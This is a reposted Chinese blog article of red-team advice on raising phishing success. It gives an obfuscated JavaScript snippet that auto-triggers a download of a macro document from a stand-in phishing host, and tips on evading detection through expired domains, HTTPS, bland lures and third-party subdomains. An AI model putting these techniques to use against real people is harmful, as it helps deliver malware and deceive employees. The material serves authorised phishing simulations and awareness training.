<!DOCTYPE html>
<html lang="zh">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<title>提高钓鱼成功率 - J0kkeR</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



    <meta name="description" content="转载自微信公众号:信安之路 本文内容仅供学习交流，如有侵权立即删除。 在红蓝对抗当中，钓鱼攻击被越来越多的红队使用，因为员工的安全意识薄弱，导致钓鱼成功的可能性很大，因为钓鱼事件导致内网被入侵的事件比比皆是，作为红队的一员做钓鱼测试的时候，如何提升钓鱼成功率，可以看看以下七点建议。 1.不直接将 payload 放置邮件内容可以将 payload 放在自己的服务器上，通过访问服务器的方式加载 pa">
<meta name="keywords" content="Reproduced">
<meta property="og:type" content="article">
<meta property="og:title" content="提高钓鱼成功率">
<meta property="og:url" content="https://www.jlovek.cn/2020/09/22/提高钓鱼成功率/index.html">
<meta property="og:site_name" content="J0kkeR">
<meta property="og:description" content="转载自微信公众号:信安之路 本文内容仅供学习交流，如有侵权立即删除。 在红蓝对抗当中，钓鱼攻击被越来越多的红队使用，因为员工的安全意识薄弱，导致钓鱼成功的可能性很大，因为钓鱼事件导致内网被入侵的事件比比皆是，作为红队的一员做钓鱼测试的时候，如何提升钓鱼成功率，可以看看以下七点建议。 1.不直接将 payload 放置邮件内容可以将 payload 放在自己的服务器上，通过访问服务器的方式加载 pa">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2020-09-22T11:37:14.019Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="提高钓鱼成功率">
<meta name="twitter:description" content="转载自微信公众号:信安之路 本文内容仅供学习交流，如有侵权立即删除。 在红蓝对抗当中，钓鱼攻击被越来越多的红队使用，因为员工的安全意识薄弱，导致钓鱼成功的可能性很大，因为钓鱼事件导致内网被入侵的事件比比皆是，作为红队的一员做钓鱼测试的时候，如何提升钓鱼成功率，可以看看以下七点建议。 1.不直接将 payload 放置邮件内容可以将 payload 放在自己的服务器上，通过访问服务器的方式加载 pa">





<link rel="icon" href="/images/tb.png">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
    
    <style>body>.footer,body>.navbar,body>.section{opacity:0}</style>
    

    
    
    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">
    

    
    

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">


    
    
    
    

<link rel="stylesheet" href="/css/back-to-top.css">


    
    
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-178521587-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-178521587-1');
</script>


    
    
<script>
var _hmt = _hmt || [];
(function() {
    var hm = document.createElement("script");
    hm.src = "//hm.baidu.com/hm.js?7fed72967ab92d97f11277419fc4adae";
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
})();
</script>

    
    

    
    
<link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

    
    
    

    


<link rel="stylesheet" href="/css/style.css">
<style type="text/css">.image.is-128x128 {border-radius: 100% !important;}</style>
</head>
<body class="is-2-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logoJ.png" alt="提高钓鱼成功率" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item" href="/">主页</a>
                
                <a class="navbar-item" href="/archives">归档</a>
                
                <a class="navbar-item" href="/categories">分类</a>
                
                <a class="navbar-item" href="/tags">标签</a>
                
                <a class="navbar-item" href="/about">关于我</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                <a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;">
                    <i class="fas fa-list-ul"></i>
                </a>
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    

    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-12-widescreen has-order-2 column-main">
<style>
  @media screen and (min-width: 1472px) {
    .is-2-column .container {
        max-width: 1344px !important;
        width: 1344px !important;
    }
  }
  @media screen and (min-width: 900px) {
    .is-1-column .container, .is-2-column .container {
        max-width: 1344px !important;
        width: 1344px !important;
    }
  }
</style>


<div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2020-09-22T11:24:51.000Z">2020-09-22</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/Network/">Network</a>&nbsp;/&nbsp;<a class="has-link-grey -link" href="/categories/Network/security/">security</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    7 分钟 读完 (大约 999 个字)
                </span>
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                提高钓鱼成功率
            
        </h1>
        
        <div class="content">
            <p><strong>转载自微信公众号:信安之路</strong></p>
<p><strong>本文内容仅供学习交流，如有侵权立即删除。</strong></p>
<p>在红蓝对抗当中，钓鱼攻击被越来越多的红队使用，因为员工的安全意识薄弱，导致钓鱼成功的可能性很大，因为钓鱼事件导致内网被入侵的事件比比皆是，作为红队的一员做钓鱼测试的时候，如何提升钓鱼成功率，可以看看以下七点建议。</p>
<h3 id="1-不直接将-payload-放置邮件内容"><a href="#1-不直接将-payload-放置邮件内容" class="headerlink" title="1.不直接将 payload 放置邮件内容"></a>1.不直接将 payload 放置邮件内容</h3><p>可以将 payload 放在自己的服务器上，通过访问服务器的方式加载 payload 使用的钓鱼 url 最好做一下 url 重写，例如使用： </p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://phishy.domain/company/code/a2ef362e-45d0-b21d-5abf-edce29d365cb/)</span><br></pre></td></tr></table></figure>
<p>而不是：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://phishy.domain/company/index.php</span><br></pre></td></tr></table></figure>
<p>可以用下面的方式配置 apache 的 url 重写：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">RewriteEngineOn</span><br><span class="line">RewriteCond%&#123;REQUEST_FILENAME&#125; !-f</span><br><span class="line">RewriteCond%&#123;REQUEST_FILENAME&#125; !-d</span><br><span class="line">RewriteRule ^(.*)$ index.php [L,QSA]</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h3 id="2-不直接在邮件内容中添加恶意附件"><a href="#2-不直接在邮件内容中添加恶意附件" class="headerlink" title="2.不直接在邮件内容中添加恶意附件"></a>2.不直接在邮件内容中添加恶意附件</h3><p>可以通过嵌入 html、js 等方式进行恶意文件加载，html 方式如：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;ahref=&quot;https://phishy.domain/payload.docm&quot;&gt;</span><br><span class="line">download the code of conduct</span><br><span class="line">&lt;/a&gt;</span><br></pre></td></tr></table></figure>
<p>javascript 的方式如：</p>
<figure class="highlight plain hljs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;aid=&quot;download&quot;href=&quot;#&quot;&gt;</span><br><span class="line">download the code of conduct</span><br><span class="line">&lt;/a&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">document.getElementById(&quot;download&quot;).onclick = function() &#123;</span><br><span class="line">document.location = &quot;https://phish&quot; + &quot;y.domain/pay&quot; + &quot;load.docm&quot;; &#125;;</span><br><span class="line">document.getElementById(&quot;download&quot;).click();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<h3 id="3-钓鱼域名使用过期域名"><a href="#3-钓鱼域名使用过期域名" class="headerlink" title="3.钓鱼域名使用过期域名"></a>3.钓鱼域名使用过期域名</h3><p>申请的域名最怕的是已经被安全产品标记为恶意，所以在申请域名的时候，可以去找一些刚过期的域名，为了迷惑对手，可以尝试根据关键词来搜索过期域名，然后进行注册，提升钓鱼的成功率，下面的网站是可以查询过期域名的：</p>
<blockquote>
<p><a href="https://www.expireddomains.net/backorder-expired-domains/" target="_blank" rel="noopener">https://www.expireddomains.net/backorder-expired-domains/</a></p>
</blockquote>
<p>如下工具可以直接输入关键词就可以获得一些相似的过期域名信息，项目地址：</p>
<blockquote>
<p><a href="https://github.com/Mr-Un1k0d3r/CatMyPhish" target="_blank" rel="noopener">https://github.com/Mr-Un1k0d3r/CatMyPhish</a></p>
</blockquote>
<h3 id="4-搭建钓鱼网站尽量使用-https"><a href="#4-搭建钓鱼网站尽量使用-https" class="headerlink" title="4.搭建钓鱼网站尽量使用 https"></a>4.搭建钓鱼网站尽量使用 https</h3><p>因为浏览器会将使用 http 的网站标记为不安全，我们可以申请一些免费的 https 证书，给自己的钓鱼网站添加正常的证书，更具有迷惑性。</p>
<h3 id="5-钓鱼内容尽量无趣"><a href="#5-钓鱼内容尽量无趣" class="headerlink" title="5.钓鱼内容尽量无趣"></a>5.钓鱼内容尽量无趣</h3><p>在企业内部经常会收到一些规章制度的邮件、或者内部发布的一些无聊且需要执行的邮件内容，大家在看到邮件内容的时候，不会过多的关注，可能默默的就完成了提示的操作，这样可以减少大家互相讨论导致的钓鱼行为被暴露的风险。</p>
<h3 id="6-尽可能使用第三方的子域名"><a href="#6-尽可能使用第三方的子域名" class="headerlink" title="6.尽可能使用第三方的子域名"></a>6.尽可能使用第三方的子域名</h3><p>如果有正常网站的子域名可以用，尽量使用，因为这类域名通常不会被安全软件标记为恶意域名，在大众的心理也会比较信任，比如那些提供二级或者三级域名使用的云服务。</p>
<h3 id="7-每次使用的域名尽量不复用"><a href="#7-每次使用的域名尽量不复用" class="headerlink" title="7.每次使用的域名尽量不复用"></a>7.每次使用的域名尽量不复用</h3><p>在被安全公司分析出域名存在恶意行为之后，会被标记并加入威胁情报当中，如果复用该域名，很有可能被安全软件命中威胁情报，从而提前暴露钓鱼行为，导致钓鱼测试失败。</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>以上是作为攻击方需要注意的几点，而作为防守方，需要做的事情更多，比如提升全民安全意识、邮件安全网关、网络层入侵检测、主机层入侵检测、终端安全等，每个环节都需要进行重点防御。对于员工安全意识提升方面，以攻促防，通过多次实际的钓鱼模拟测试来提升员工对钓鱼邮件的免疫能力，这是一个艰难而又漫长的过程。</p>

            <div class="level is-size-7 has-text-grey">
    <div class="level-left">
        <i class="far fa-eye"></i>
        <span>&nbsp;</span>
        <span id="busuanzi_container_page_pv" style="display: inline;">
            <span id="busuanzi_value_page_pv">0</span>
        </span>
    </div>
</div>
        </div>
        
        <div class="level is-size-7 is-uppercase">
            <div class="level-start">
                <div class="level-item">
                    <span class="is-size-6 has-text-grey has-mr-7">#</span>
                    <a class="has-link-grey -link" href="/tags/Reproduced/">Reproduced</a>
                </div>
            </div>
        </div>
        
        
        
        <div class="social-share"></div>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css">
<script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="menu-label has-text-centered">如果觉得我的文章对您有用，请随缘打赏~您的支持将鼓励我继续创作！</h3>
        <div class="buttons is-centered">
            
                
<a class="button is-info donate">
    <span class="icon is-small">
        <i class="fab fa-alipay"></i>
    </span>
    <span>支付宝</span>
    <div class="qrcode"><img src="/images/zfb.jpg" alt="支付宝"></div>
</a>

                
                
<a class="button is-success donate">
    <span class="icon is-small">
        <i class="fab fa-weixin"></i>
    </span>
    <span>微信</span>
    <div class="qrcode"><img src="/images/wx.jpg" alt="微信"></div>
</a>

                
        </div>
    </div>
</div>



<div class="card card-transparent">
    <div class="level post-navigation is-flex-wrap is-mobile">
        
        <div class="level-start">
            <a class="level level-item has-link-grey  article-nav-prev" href="/2020/11/02/CrowdStrike/">
                <i class="level-item fas fa-chevron-left"></i>
                <span class="level-item">CrowdStrike</span>
            </a>
        </div>
        
        
        <div class="level-end">
            <a class="level level-item has-link-grey  article-nav-next" href="/2020/07/12/重新设计-Facebook-的数据中心网络/">
                <span class="level-item">重新设计 Facebook 的数据中心网络</span>
                <i class="level-item fas fa-chevron-right"></i>
            </a>
        </div>
        
    </div>
</div>



<div class="card">
    <div class="card-content">
        <h3 class="title is-5 has-text-weight-normal">评论</h3>
        
<div id="valine-thread"></div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    new Valine({
        el: '#valine-thread' ,
        notify: false,
        verify: false,
        app_id: 'NnB3IeC244Rt4VY9rThBjI1H-gzGzoHsz',
        app_key: '3TLMC7bqq2H82vuxQIO7OKVu',
        placeholder: '随便说点啥都行~'
    });
</script>

    </div>
</div>


</div>
                
            </div>
        </div>
    </section>
    <footer class="footer">
    <div class="container">
        <div class="level">
            <div class="level-start has-text-centered-mobile">
                <a class="footer-logo is-block has-mb-6" href="/">
                
                    <img src="/images/logoJ.png" alt="提高钓鱼成功率" height="28">
                
                </a>
                <p class="is-size-7">
                &copy; 2020 Pe1Ha0&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a href="http://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>
                </p>
            </div>
            <div class="level-end">
            <span id="busuanzi_container_site_uv">
    ❤️ 感谢
    <span id="busuanzi_value_site_uv">0</span>
    位小伙伴的
</span>
<span id="busuanzi_container_site_pv">
    <span id="busuanzi_value_site_pv">0</span>
    次陪伴
</span>
</div>
            
            <div class="level-end">
            
                <div class="field has-addons is-flex-center-mobile has-mt-5-mobile is-flex-wrap is-flex-middle">
                
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Creative Commons" href="https://creativecommons.org/">
                        
                        <i class="fab fa-creative-commons"></i>
                        
                    </a>
                </p>
                
                <p class="control">
                    <a class="button is-white is-large" target="_blank" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/">
                        
                        <i class="fab fa-creative-commons-by"></i>
                        
                    </a>
                </p>
                
                </div>
            
            </div>
        </div>
    </div>
</footer>
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script>
<script>moment.locale("zh-CN");</script>


    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {matchFontHeight: false},
        SVG: {matchFontHeight: false},
        CommonHTML: {matchFontHeight: false}
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    
    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>
    <script src="/js/clipboard.js" defer></script>
    

    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么...">
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>